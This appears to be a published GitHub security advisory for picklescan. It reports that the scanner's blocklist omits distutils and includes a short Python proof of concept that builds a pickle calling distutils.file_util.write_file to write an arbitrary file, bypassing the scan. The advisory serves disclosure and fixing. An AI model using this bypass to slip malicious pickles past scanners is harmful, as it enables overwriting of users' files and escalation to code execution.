UNKNOWN PyPI
Picklescan vulnerable to Arbitrary File Writing
GHSA-m273-6v24-x4m4
Published ยท Modified
Description
Summary
Picklescan has got open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However the module distutils isnt blocked and can be used for the same purpose ie to write arbitrary files.
Details
This is another vulnerability which impacts the downstream user.
By constructing a pickle that user distutils.file_util.write_file, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE.
PoC
import pickle
import distutils.file_util
class FileWriteBypass:
def __reduce__(self):
target_file = "pwned_config.env"
content = ["print('I have overwritten your config')"]
return (distutils.file_util.write_file, (target_file, content))
payload = pickle.dumps(FileWriteBypass())
with open("bypass_filewrite.pkl", "wb") as f:
f.write(payload)
print("bypass_filewrite.pkl")
To fix this just add disutil to the blacklist
References
- WEB https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m273-6v24-x4m4
- WEB https://github.com/mmaitre314/picklescan/pull/53
- WEB https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab
- PACKAGE https://github.com/mmaitre314/picklescan
- WEB https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33
Ready to move
Start Securing
Free, no credit card | First findings in minutes